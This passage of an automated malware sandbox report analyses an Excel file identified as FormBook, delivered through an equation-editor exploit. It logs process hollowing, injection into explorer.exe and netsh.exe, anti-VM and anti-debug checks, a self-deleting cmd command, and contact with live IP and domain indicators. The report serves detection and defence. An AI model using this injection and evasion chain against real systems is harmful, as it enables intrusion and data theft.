      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FEA0 NtReadVirtualMemory,8_2_00C6FEA0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FE24 NtWriteVirtualMemory,8_2_00C6FE24
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FFFC NtCreateProcessEx,8_2_00C6FFFC
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C6FF34 NtQueueApcThread,8_2_00C6FF34
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_000985B0 NtCreateFile,8_2_000985B0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00098660 NtReadFile,8_2_00098660
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_000986E0 NtClose,8_2_000986E0
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe 2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
      Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe 2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
      Source: Sajeeb09908976745344567.xlsxVirustotal: Detection: 29%
      Source: Sajeeb09908976745344567.xlsxReversingLabs: Detection: 21%
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Sajeeb09908976745344567.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC30.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/15@2/2
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00402053 CoCreateInstance,MultiByteToWideChar,4_2_00402053
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_00404292
      Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: netsh.pdb source: vbc.exe, 00000005.00000002.556406324.0000000000553000.00000004.00000020.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, netsh.exe

      Data Obfuscation:

      barindex
      Detected unpacking (changes PE section rights)Show sources
      Source: C:\Users\Public\vbc.exeUnpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1000A505 push ecx; ret 4_2_1000A518
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B85C push eax; ret 5_2_0041B862
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C932 pushfd ; ret 5_2_0041C933
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041525A pushfd ; ret 5_2_0041525B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00416235 push 1D9B51BBh; retf 5_2_0041623A
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00415C87 push cs; iretd 5_2_00415C88
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0040AEB2 push ebp; retf 5_2_0040AEBC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7F2 push eax; ret 5_2_0041B7F8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7FB push eax; ret 5_2_0041B862
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7A5 push eax; ret 5_2_0041B7F8
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C7DFA1 push ecx; ret 8_2_00C7DFB4
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0009B85C push eax; ret 8_2_0009B862
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0009C932 pushfd ; ret 8_2_0009C933
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00096235 push 1D9B51BBh; retf 8_2_0009623A
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0009525A pushfd ; ret 8_2_0009525B
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00095C87 push cs; iretd 8_2_00095C88
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0008AEB2 push ebp; retf 8_2_0008AEBC
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0009B7A5 push eax; ret 8_2_0009B7F8
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0009B7FB push eax; ret 8_2_0009B862
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0009B7F2 push eax; ret 8_2_0009B7F8
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dllJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10008836 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_10008836
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2724Thread sleep time: -300000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exe TID: 2628Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc 5_2_004088C0
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E93 FindFirstFileA,FindClose,4_2_00405E93
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_004054BD
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00402671 FindFirstFileA,4_2_00402671
      Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000006.00000000.506645799.0000000008374000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000006.00000000.512518257.000000000457A000.00000004.00000001.sdmpBinary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________'
      Source: explorer.exe, 00000006.00000000.512518257.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: vbc.exe, 00000004.00000002.493761978.00000000005C4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: explorer.exe, 00000006.00000000.521416523.00000000044E7000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0Co>
      Source: explorer.exe, 00000006.00000000.508758981.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: vbc.exe, 00000004.00000002.493761978.00000000005C4000.00000004.00000020.sdmpBinary or memory string: ^ECVMWar_VMware
      Source: explorer.exe, 00000006.00000000.505152521.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1000CDB2 IsDebuggerPresent,4_2_1000CDB2
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100093F8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_100093F8
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100098C2 GetProcessHeap,4_2_100098C2
      Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc 5_2_004088C0
      Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001A402 mov eax, dword ptr fs:[00000030h]4_2_1001A402
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001A616 mov eax, dword ptr fs:[00000030h]4_2_1001A616
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001A6C7 mov eax, dword ptr fs:[00000030h]4_2_1001A6C7
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001A706 mov eax, dword ptr fs:[00000030h]4_2_1001A706
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001A744 mov eax, dword ptr fs:[00000030h]4_2_1001A744
      Source: C:\Users\Public\vbc.exeCode function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h]5_2_009226F8
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_00C826F8 mov eax, dword ptr fs:[00000030h]8_2_00C826F8
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B30 LdrLoadDll,5_2_00409B30
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10009B60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_10009B60

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.washingtonboatrentals.com
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1640000Jump to behavior
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 1764Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
      Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
      Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Users\Public\vbc.exeCode function: 4_2_100098DF cpuid 4_2_100098DF
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10012E10 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_10012E10
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_004030FB

      Lowering of HIPS / PFW / Operating System Security Settings:

      barindex
      Uses netsh to modify the Windows network and firewall settingsShow sources
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Application Shimming1Process Injection612Masquerading111OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsApplication Shimming1Disable or Modify Tools2LSASS MemorySecurity Software Discovery251Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncSystem Information Discovery115Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502271 Sample: Sajeeb09908976745344567.xlsx Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 42 www.washingtonboatrentals.com 2->42 48 Multi AV Scanner detection for domain / URL 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 14 other signatures 2->54 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 33 26 2->16         started        signatures3 process4 dnsIp5 46 192.3.110.172, 49165, 80 AS-COLOCROSSINGUS United States 11->46 36 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->36 dropped 38 C:\Users\Public\vbc.exe, PE32 11->38 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->76 18 vbc.exe 17 11->18         started        40 C:\Users\...\~$Sajeeb09908976745344567.xlsx, data 16->40 dropped file6 signatures7 process8 file9 34 C:\Users\user\AppData\Local\...\dulsmde.dll, PE32 18->34 dropped 56 Multi AV Scanner detection for dropped file 18->56 58 Detected unpacking (changes PE section rights) 18->58 60 Machine Learning detection for dropped file 18->60 62 2 other signatures 18->62 22 vbc.exe 18->22         started        signatures10 process11 signatures12 64 Modifies the context of a thread in another process (thread injection) 22->64 66 Maps a DLL or memory area into another process 22->66 68 Sample uses process hollowing technique 22->68 70 Queues an APC in another process (thread injection) 22->70 25 explorer.exe 22->25 injected process13 dnsIp14 44 www.washingtonboatrentals.com 3.64.163.50, 49168, 80 AMAZON-02US United States 25->44 72 System process connects to network (likely due to code injection or exploit) 25->72 74 Uses netsh to modify the Windows network and firewall settings 25->74 29 netsh.exe 25->29         started        signatures15 process16 signatures17 78 Modifies the context of a thread in another process (thread injection) 29->78 80 Maps a DLL or memory area into another process 29->80 82 Tries to detect virtualization through RDTSC time measurements 29->82 32 cmd.exe 29->32         started        process18

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Sajeeb09908976745344567.xlsx30%VirustotalBrowse
      Sajeeb09908976745344567.xlsx22%ReversingLabsDocument-Excel.Exploit.CVE-2017-11882

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\Public\vbc.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe36%ReversingLabsWin32.Trojan.Nsisx
      C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll0%ReversingLabs
      C:\Users\Public\vbc.exe36%ReversingLabsWin32.Trojan.Nsisx

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      4.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
      4.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
      8.2.netsh.exe.6d3da0.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      5.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
      4.2.vbc.exe.3030000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      8.2.netsh.exe.2c6796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
      5.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

      Domains
